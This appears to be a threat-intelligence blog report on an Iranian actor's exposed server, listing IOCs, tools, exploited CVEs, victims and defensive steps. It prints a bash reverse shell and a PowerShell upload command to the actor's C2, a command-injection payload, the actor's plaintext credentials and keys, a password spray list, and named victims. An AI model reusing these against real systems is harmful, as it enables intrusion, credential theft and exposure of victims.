Get MILBERT.ai FREE for 90 daysActivate Now
    Back to Blog
    Threat Intelligence

    Iranian Threat Actor: Tools, Techniques, IOCs, and IOAs

    James McMurryMarch 14, 202615 min read

    A note on publication timing

    This report was distributed to ThreatHunter.ai subscribers on March 6, 2026. It was not published publicly at that time. We held it for eight days to give defenders who received it first a meaningful head start before the intelligence became widely available.

    We are publishing it now in full, without sanitization, because everything in this report is directly relevant to understanding the Iranian cyber campaign that produced the Stryker wipe on March 11. The pre-positioning TTPs, the Rclone exfiltration to Wasabi, the credential infrastructure, the victim profile. It is all connected. Defenders deserve to see the full picture.

    Server: sdrhi  |  Primary C2: 157.20.182.49

    On March 6, 2026, I was working a lead on an Iranian threat actor's infrastructure when I found an open directory on their operational server. The hostname was sdrhi. The IP was 157.20.182.49. The server was live. Python SimpleHTTP was running on port 8888. The directory was open.

    I read everything.

    What follows is a full technical report on what was there: the tools, the targets, the credentials, the malware, the exploit code, the victims, and the data they had already stolen. Nothing is redacted. These are real indicators from a live operation against real organizations.

    The server was active at the time of analysis. The operational period runs from March 2025 through March 2026. The targeting is Israeli-primary with secondary targeting across Egypt, UAE, Jordan, Saudi Arabia, and Portugal.

    Overview

    Category Detail
    Custom Tools 7 scripts and binaries
    CVEs Exploited or Scanned 11
    Confirmed Compromised Orgs 6+
    Email Accounts Compromised 180+ (OWA brute force)
    Israeli IPs Targeted 280+
    Exfiltrated Data Types Passports, credit cards, payroll, corporate docs, biometrics
    C2 Infrastructure IPs 4
    Meterpreter Payloads Generated 19+
    SOCKS Proxy Tunnels 6+ simultaneous
    Operator Handle Sam (tmux sessions: 21sam, 23sam)

    Threat Actor Profile

    Attribute Detail
    Attribution Iranian (Farsi-language artifacts, Iranian ISP blocks, targeting profile)
    Operator Handle Sam (tmux sessions: 21sam, 23sam); multiple operators indicated
    Server Hostname sdrhi
    Primary C2 IP 157.20.182.49
    Primary Language Persian/Farsi (code comments, keyboard layout artifacts)
    Hosting Germany (de.archive.ubuntu.com apt mirror)
    Operating System Ubuntu Linux (Python 3.12.3)
    Session Management tmux (20+ named sessions)
    Workspaces im/, moz/, jojo/, tanbe/, mine/, sa/, holo/ compartmentalized by operation
    Operational Period Confirmed active January through March 2026
    Primary Targets Israel
    Secondary Targets Egypt, UAE, Jordan, Saudi Arabia, Portugal
    Motivation Espionage, data theft (PII, financial, corporate), persistent access

    Threat Actor Infrastructure

    IP Address Role Evidence
    157.20.182.49 Primary C2 / Attack Server All 19 msfvenom LHOST callbacks, reverse shell destination, OWA brute force origin, Nuclei scanning origin, file exfil receiver port 10443. German hosting.
    162.0.230.185 Secondary Payload Server Served x.exe on port 8000. Credentials in server.txt: root / G66BqeNV9hn35M8oQb
    194.11.246.101 FortiOS Exploit Source Hardcoded in POC_ZZ_1.py WebSocket login frame as source address 194.11.246.101:1338
    18.223.24.218 Data Exfil (AWS EC2) AWS EC2 US-East-2. Received stolen credit card data from E:\DATA\PEACE2\Personnel_Share\CreditCards\Amex\

    Phishing Infrastructure

    sso.bookairway.com: Phishing site with Let's Encrypt SSL certificate, Apache reverse proxy to Python backend on port 8080.

    DNS Exfiltration Callback

    01d5ed12-3bb2-41b1-9315-2fa7140945e3.dnshook.site: Used for DNS-based data exfiltration (md5sum of payload sent via nslookup).

    File Hashes

    SHA256 Filename Description
    95bf653a233a0b8d5be504bf56b6703e7479e54c8f4573947d64baec638833cb owa.py Async OWA brute forcer (aiohttp, 100 concurrent)
    54fe2f395a5b255eaac0f88261165982ad1da766b65cde5639257d53242106cd owa-2.py Threaded OWA brute forcer with combo mode
    fd6b46d148af22da6163f18ce43b35ebb827cc6e140f03f0f514bc2a6f548743 POC_ZZ_1.py CVE-2024-55591 FortiOS exploit (modified watchTowr)
    4150aeab40fb979995e701f78731a0897d06616c7426973cbcf8a18c5c3dc58a cve.yaml Nuclei template, CVE-2025-54068 Laravel Livewire RCE
    443fd4bf218cf11df015c5e5f13649011a9754d48831ed0fb6de96ed4907623d cve-2.yaml Nuclei template, CVE-2026-24061 telnetd auth bypass
    7ab597ff0b1a5e6916cad1662b49f58231867a1d4fa91a4edf7ecb73c3ec7fe6 reset.ps1 Obfuscated PowerShell malware dropper (2.2MB)
    8ca5be8eed3fd564a11689f0ae7343d46f00c633a5ea8275a7c8cd91a095f9f7 bin Subfinder binary (Go ELF x86-64, statically linked)
    eae1ae69b6e678229b69b49a3f884ed727a03fa11c25f154cc88785a6924c170 web.py Flask file exfiltration receiver (port 10443)
    7745d3a1a5e758bebe01940f3c407d66f5223dbbf9e4c4187536b0bbaabd0bd2 adbencrypt.exe PE32, ZKTeco encryption utility
    a90d7d53b0f2f2aab99c19141c5de10b4fdf2818e2860798c836d48ff1c6a117 Att.exe PE32, ZKTeco attendance (PECompact2 compressed)
    c790f5f6c08ee61935365cd1631a21e5261f03a04dcb361824573fb1268f5351 setup.exe PE32, ZKTeco installer

    Webshell Indicators

    Indicator Value
    Webshell Type Neo-reGeorg ASPX tunnel
    Webshell Key 123QWEasd
    Path Pattern /aspnet_client/system_web/4_0_30319/nfud.aspx
    Deployed Location 1 https://mail.sef.pt/aspnet_client/system_web/4_0_30319/nfud.aspx (Portuguese Immigration Service, SEF)
    Deployed Location 2 https://69.167.160.144/nfud.aspx
    SOCKS Proxy Ports 1080, 1085, 10800, 10843, 10850, 10555, 10830
    Listener Ports 443, 4040, 1085

    Credential Artifacts

    Resocks / Revsocks Encryption Keys

    Key / Password Tool
    bqLe1ch3x53bdWnbOH4yyCLmakBzW0Hne3wM7LI13Kc Resocks (primary, used 20+ times)
    LVUYcklWVT4X+hIF9GXnACw8HjA39S/VM4cJwXn3km8 Resocks
    XHEUq0eV8JjQqBa35zag1rw0I+KIWSBtITZOxzg/kkc Resocks
    89aFTqq2PJBpBXzxD54/aRi5nsDx8dy4QyCaMjFuE0o Resocks
    SuperSecretPassword Revsocks password

    Staging Server Credentials

    IP Username Password Source
    162.0.230.185 root G66BqeNV9hn35M8oQb server.txt

    API Keys and Tokens

    Service Key
    Shodan API Key MijnMaksNo4GCF6KlnWBbh52VMC47Hxm

    User-Agent string used in scanning: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36

    Custom Attack Tools

    owa.py: Async OWA Brute Forcer

    Attribute Detail
    Language Python 3 (aiohttp, asyncio)
    Concurrency Up to 100 simultaneous connections via asyncio.Semaphore
    Target Endpoint /owa/auth.owa
    Success Detection HTTP redirect Location header to /owa (vs /auth/logon.aspx for failure)
    Features Progress tracking with ETA, retry logic (3 attempts with backoff), proxy support, Persian-language code comments
    Banner OWA Fucker
    Output URL|username|password format to success.txt

    owa-2.py: Threaded OWA Brute Forcer

    Attribute Detail
    Language Python 3 (requests, ThreadPoolExecutor)
    Modes Brute force (-m bf) and combo (-m combo) for paired user:pass lists
    Expired Password Detection Detects redirect to /auth/expiredpassword.aspx, saves to expiredpassword.txt
    IP Block Detection Identifies HTTP 400 responses indicating IP-based blocking

    web.py: File Exfiltration Server

    Attribute Detail
    Language Python 3 (Flask)
    Port 10443
    Endpoint POST /success, accepts file uploads, saves with original filename
    Client Command PowerShell: New-Object System.Net.WebClient; $wc.UploadFile(http://IP:10443/success, filepath)
    Confirmed Exfil E:\DATA\PEACE2\Personnel_Share\CreditCards\Amex\ (credit cards); C:\Users\riyad\desktop\ (full desktop)

    reset.ps1: Obfuscated PowerShell Dropper (2.2MB)

    A heavily obfuscated PowerShell script functioning as a malware loader using Node.js as a Living-off-the-Land Binary.

    Stage Behavior
    Stage 1 Creates %USERPROFILE%\AppData\Local\Nodejs\
    Stage 2 Downloads Node.js v18.17.0 from nodejs.org (legitimate binary used as LOLBin)
    Stage 3 Adds Node.js directory to user PATH environment variable
    Stage 4 AES-CBC decrypts hex-encoded embedded payload using hardcoded key and IV
    Stage 5 Writes decrypted JavaScript to sysuu2etiprun.js
    Stage 6 Runs npm install for required packages
    Stage 7 Executes JS payload via downloaded node.exe
    Stage 8 Autorun mechanism for persistence across reboots

    Obfuscation: Extensive junk variables, random GUIDs, meaningless function names, dead code branches.

    Exploit Code

    POC_ZZ_1.py: FortiOS CVE-2024-55591

    Weaponized version of the watchTowr proof-of-concept for CVE-2024-55591 (FortiOS/FortiProxy authentication bypass via WebSocket). The actor modified this PoC to:

    • Create super_admin accounts: FortiWiFi/FortiWiFi123, FortiSetup, FortiAdmin
    • Add created users to VPN user groups: ssl-vpn-groupamoss, VPN-Users
    • Enumerate existing VPN users and groups
    • Hardcode victim-specific configurations with Israeli employee names: shachar, sigal, amos, sima, lev, gabi, roy
    • Reference Israeli company email: offices@agentek.co.il
    • Include encoded password hashes from compromised FortiGate devices

    Custom Nuclei Templates

    Template CVE Target Type Severity
    cve.yaml CVE-2025-54068 Laravel Livewire v3 Deserialization RCE Critical
    cve-2.yaml CVE-2026-24061 GNU Inetutils telnetd Auth Bypass to root Critical (9.8)

    Meterpreter Payloads

    19 Meterpreter payloads generated via msfvenom, all calling back to 157.20.182.49:443:

    Payload Name Type Format
    shell.elf linux/x64/meterpreter/reverse_tcp ELF
    2026.elf linux/x64/shell_reverse_tcp ELF
    999.elf linux/x64/meterpreter/reverse_tcp ELF
    666.elf linux/x64/meterpreter_reverse_tcp ELF
    1.elf linux/x64/meterpreter_reverse_tcp ELF
    0.elf linux/x64/meterpreter_reverse_tcp ELF
    last.elf linux/x64/meterpreter_reverse_https ELF
    zip.elf Multiple types tested ELF
    aspx.aspx windows/x64/meterpreter_reverse_https ASPX

    CVEs Exploited or Scanned

    CVE Product Severity Activity Confirmed Targets
    CVE-2024-55591 FortiOS / FortiProxy Critical 9.8 Active exploitation, creates super_admin accounts, adds VPN users Multiple Israeli FortiGate devices
    CVE-2024-23113 FortiOS (format string) Critical Two exploit repos cloned, PoC executed against 212.29.200.149 1+ confirmed
    CVE-2026-1281 Ivanti EPMM Critical Mass scanning via custom Nuclei template against 5,304 Shodan targets 5 confirmed: 185.55.15.173, 49.255.190.4, 84.72.235.18, 86.51.13.69, 88.151.16.232
    CVE-2025-54068 Laravel Livewire v3 Critical Custom Nuclei template for deserialization RCE 9 confirmed
    CVE-2025-34291 Langflow Critical Mass scanning against target list 50+ confirmed
    CVE-2025-52691 SmarterMail Critical Mass scanning against target list 50+ confirmed
    CVE-2025-9316 N-able N-Central Medium Mass scanning plus active WebSocket RCE exploitation 50+ scanned, 3+ actively exploited
    CVE-2025-68613 N8N Unknown Nuclei scanning Unknown
    CVE-2025-47813 Unknown (loginok.html) Medium Mass scanning 50+ confirmed
    CVE-2026-24061 GNU Inetutils telnetd Critical 9.8 Custom Nuclei template for auth bypass 56 targets in ips.txt
    N-Central WS RCE N-able N-Central Critical WebSocket command injection via hax[$(cmd)] payload 3+ actively exploited

    Confirmed Victims and Impact

    Confirmed Compromised Organizations

    Organization Domain / IP Country Impact
    EgyptAir (Riyadh Station) email.egyptair.com Egypt / Saudi Arabia Full data exfiltration: passports, visas, payroll, credit card data (Amex), corporate documents, ZKTeco biometric DB, SGS records. Path: E:\DATA\PEACE2\Personnel_Share\
    Bavaria Group Egypt mail.bavaria.com.eg Egypt 37 OWA accounts compromised with passwords P@ssw0rd and 123456
    Intercom Enterprises mail.intercom.com.eg Egypt 143+ OWA accounts compromised; 50+ expired password accounts
    Sino Tharwa Group mail.sinotharwa.com.eg Egypt Expired password credential hits
    Portuguese Immigration (SEF) mail.sef.pt Portugal Neo-reGeorg webshell on Exchange server for persistent access and tunneling
    Unknown 69.167.160.144 Unknown Neo-reGeorg webshell deployed
    Multiple FortiGate victims Various Israeli IPs Israel Admin accounts created, VPN users added via CVE-2024-55591

    Targeted Organizations (Recon / Scanning / Brute Force)

    Organization Domain / IP Country Activity
    NMDC Group mail.nmdc-group.com UAE OWA + SMTP brute force, full AD username enumeration (77 admin accounts)
    Terem Medical Centers mail.terem.com Israel OWA brute force, full AD user enumeration (123 accounts)
    GoHost gohost.co.il Israel OWA brute force
    Jewish Agency jewishagency.org Israel Subdomain enumeration
    Nefesh B'Nefesh nbn.org.il Israel Subdomain enumeration
    Yahel Israel yahelisrael.com Israel Subdomain enumeration
    Terrogence terrogence.com Israel Subdomain enumeration (Israeli intelligence firm)
    Salam Palestine salampalestine.org Palestine Subdomain enumeration
    Clearview AI clearview.ai USA Subdomain enumeration + Nuclei scanning
    Jordanian Government webmail.gov.jo Jordan Probed
    280+ Israeli OWA servers Various 62.90.x, 84.110.x, 51.x, 212.x Israel Mass OWA brute force campaigns
    95 SMS/Telecom providers Various (domains.txt) Israel/Global Reconnaissance of Israeli SMS infrastructure

    Data Exfiltration Evidence

    EgyptAir Riyadh Station: Complete Data Theft

    The threat actor's webserver (http://157.20.182.49:8888/webserver/) was hosting exfiltrated data from EgyptAir's Riyadh maintenance station. Data was exfiltrated using PowerShell WebClient.UploadFile() commands found in up.txt, targeting both the primary C2 (157.20.182.49:10443) and an AWS instance (ec2-18-223-24-218.us-east-2:443).

    Data Category Files Sensitivity
    Credit Card Data Contents of E:\DATA\PEACE2\Personnel_Share\CreditCards\Amex\ Critical, PCI violation
    Employee Passports Passport scans: Abu Rehab, Hassan Sami, Youssef Zeidan, Mohamed Ahmed Critical, PII
    Employee Visas Saudi visa documents with phone numbers High, PII
    National ID Cards Personal ID card documents (Arabic) Critical, PII
    Salary / Payroll Monthly transport allowances for 7 named employees, annual salary statement 2021-2022 High, Financial PII
    Financial Records Daily revenue, July 2025 revenue, airport receipts, insurance records, compensations High, Corporate confidential
    Corporate Documents Company mail forms, discharge forms (EN/AR), cancellation letters, damage reports Medium, Corporate
    Biometric Data Complete ZKTeco time and attendance system (setup.exe, Att.exe, encrypted DBs, .dbf files) Critical, Biometric PII
    SGS Records Saudi Ground Services data spanning 2019-2025 High, Corporate
    Bank Reports Alinma Bank report (Saudi bank) High, Financial
    WhatsApp Media 4 images + 1 video from employee phones (Aug-Nov 2025) Medium, Personal
    Desktop Contents Full recursive contents of C:\Users\riyad\desktop\ High, Unknown scope

    Cloud-to-Cloud Exfiltration

    Rclone was used to copy ERPBackup data from Wasabi cloud storage (wasabbi:wasabirclone/ERPBackup) to Put.io (putio:/iiitdEDUin). The actor had access to an organization's ERP backup in Wasabi and transferred it to a personal Put.io account for persistent offline access.

    TTPs: MITRE ATT&CK Mapping

    Technique Tactic Name Evidence
    T1595.002 Reconnaissance Vulnerability Scanning Mass Nuclei scanning against Shodan-harvested targets: Ivanti EPMM (5,304), N-Central, Langflow, SmarterMail, N8N, FortiGate
    T1593.002 Reconnaissance Search Open Technical Databases Shodan queries: title:'Ivanti User Portal', http.favicon.hash:1983356674, http.favicon.hash:362091310
    T1589.001 Reconnaissance Gather Victim Identity: Credentials Username enumeration of AD domains: NMDC, NMDCDOM, terem, EgyptAir (200+ accounts each)
    T1583.001 Resource Dev Acquire Infra: Domains sso.bookairway.com, phishing domain with Let's Encrypt SSL
    T1583.003 Resource Dev Acquire Infra: VPS 157.20.182.49 (Germany), 162.0.230.185, AWS EC2 18.223.24.218
    T1587.001 Resource Dev Develop Capabilities: Malware Custom OWA brute forcers, reset.ps1 dropper, web.py exfil server
    T1587.004 Resource Dev Develop Capabilities: Exploits Modified CVE-2024-55591 PoC, custom Nuclei templates
    T1190 Initial Access Exploit Public-Facing Application CVE-2024-55591, CVE-2026-1281, CVE-2025-54068, CVE-2025-34291, CVE-2025-52691, N-Central WS RCE, CVE-2026-24061
    T1110.001 Initial Access Brute Force: Password Guessing Mass OWA brute forcing: mail.bavaria.com.eg (37 hits), mail.intercom.com.eg (143+ hits)
    T1110.004 Initial Access Brute Force: Credential Stuffing OWA combo mode (-m combo) pairing harvested user:pass lists
    T1566.002 Initial Access Phishing: Spearphishing Link sso.bookairway.com phishing infrastructure
    T1059.001 Execution PowerShell reset.ps1 dropper: AES decryption, Node.js download, JS payload execution; PowerShell WebClient for data exfil
    T1059.007 Execution JavaScript Decrypted JS payload (sysuu2etiprun.js) executed via downloaded Node.js runtime
    T1059.004 Execution Unix Shell bash -i >& /dev/tcp/157.20.182.49/9001 0>&1
    T1203 Execution Exploitation for Client Execution FortiOS WebSocket command injection, N-Central hax[$(command)] injection
    T1505.003 Persistence Web Shell Neo-reGeorg ASPX webshell (nfud.aspx) at mail.sef.pt and 69.167.160.144
    T1136.001 Persistence Create Account: Local FortiOS exploit creates FortiWiFi (super_admin), FortiSetup, FortiAdmin; SSH user asuedulimit
    T1547 Persistence Boot/Logon Autostart reset.ps1 persists Node.js payload as autorun
    T1110 Credential Access Brute Force Custom OWA brute forcers, SMTP brute forcing via Patator against mail.nmdc-group.com:587
    T1110.003 Credential Access Password Spraying P@ssw0rd, 123456, Welcome@123 sprayed across hundreds of accounts
    T1557 Credential Access Adversary-in-the-Middle Responder tool present for LLMNR/NBT-NS/MDNS credential harvesting
    T1071.001 C2 Web Protocols Neo-reGeorg SOCKS tunneling over HTTPS through webshells
    T1572 C2 Protocol Tunneling Resocks/Revsocks encrypted reverse SOCKS, Neo-reGeorg, ICMP tunneling
    T1573.001 C2 Encrypted Channel: Symmetric AES-encrypted PowerShell payload, Resocks encrypted tunnels with pre-shared keys
    T1090.002 C2 External Proxy Multiple SOCKS proxy layers on ports 1080, 1085, 10800, 10843, 10850, 10555, 10830
    T1219 C2 Remote Access Software Custom RDP C2 server (./server binary in rdp/c2 directory) on ports 443, 12345, 9999
    T1095 C2 Non-Application Layer Protocol ICMP tunneling tools (icmp and app_linux binaries) for C2
    T1567.002 Exfiltration Exfil Over Cloud Storage Rclone: Wasabi (wasabbi:wasabirclone/ERPBackup) to Put.io (putio:/iiitdEDUin)
    T1048.003 Exfiltration Exfil Over Alternative Protocol DNS exfiltration via dnshook.site
    T1041 Exfiltration Exfil Over C2 Channel HTTP file upload via web.py Flask server (PowerShell WebClient.UploadFile)
    T1560 Exfiltration Archive Collected Data ZIP archives of exfiltrated data

    Appendix A: Password Spray List (Top 50)

    P@ssw0rd        P@ssw0rd123      123456           Password1        Welcome@123
    admin@123       P@ssw0rd1        Welcome@1        admin123         Aa123456
    P@ssw0rd2024    P@ssw0rd2025     March@2025       March@2026       October@2024
    October@2025    December@2026    Welcome1         Password         12345
    123123          P@ssw0rd12       P@ssw0rd11       L3tm31n          abc123
    1qazZAQ!        qwer1234         Passw0rd         Password@123     Admin@123
    Admin@1234      P@$w0rd         P@$w0rd1        Ch@nge#1         Ch@nge1#
    Welcome@2024    Welcome@2021     Jan@2025         Berlin@2026      Honda@2026
    P@kistan786     Cloud@393        Oracle@3535      Helpdesk@123     Support@1234
    Pass@123456     password         12345678         123456789        Aa12345@

    Appendix B: Target IP Ranges (Israeli Focus)

    IP Range ISP / Owner Count
    62.90.x.x Bezeq International 20+
    84.110.x.x Bezeq 15+
    51.x.x.x Various cloud providers (OVH, AWS) 50+
    212.x.x.x Various Israeli ISPs 20+
    147.235.x.x Israeli hosting 10+
    192.116.x.x / 192.117.x.x Israeli academic/enterprise 10+
    82.80.x.x / 82.81.x.x / 82.166.x.x Israeli ISPs 15+
    213.8.x.x Israeli networks 10+
    31.154.x.x Israeli networks 10+
    185.x.x.x Various hosting 15+

    The ips.txt file contains 56 telnet (port 23) targets for CVE-2026-24061 exploitation, spanning Egyptian (41.x.x.x, 197.x.x.x) and Israeli IP ranges.

    Recommendations

    Immediate Actions

    • Block attacker infrastructure: 157.20.182.49, 162.0.230.185, 194.11.246.101, 18.223.24.218
    • Block phishing domain: sso.bookairway.com
    • Block DNS exfiltration domain: *.dnshook.site
    • Search all Exchange servers for Neo-reGeorg webshells: nfud.aspx in /aspnet_client/ paths
    • Audit FortiGate admin accounts for unauthorized users: FortiWiFi, FortiSetup, FortiAdmin
    • Force password reset for any account using passwords from the spray list above
    • Review OWA authentication logs for brute force patterns from the identified attacker IPs

    Patch Priority

    Product CVE(s) Priority
    FortiOS / FortiProxy CVE-2024-55591, CVE-2024-23113 CRITICAL, Active exploitation confirmed
    Ivanti EPMM CVE-2026-1281 CRITICAL, 5,304 targets scanned, 5+ confirmed vulnerable
    Laravel Livewire v3 CVE-2025-54068 CRITICAL, 9 confirmed vulnerable
    Langflow CVE-2025-34291 CRITICAL, 50+ confirmed vulnerable
    SmarterMail CVE-2025-52691 CRITICAL, 50+ confirmed vulnerable
    N-able N-Central CVE-2025-9316 + WebSocket RCE HIGH, Active exploitation confirmed
    GNU Inetutils telnetd CVE-2026-24061 HIGH, Auth bypass to root

    ThreatHunter.ai is an 18-year SDVOSB cybersecurity company. This intelligence was collected from open-source analysis of exposed threat actor infrastructure. No systems were accessed beyond what was openly published by the actor. If your organization is listed above and has not yet been notified, contact us.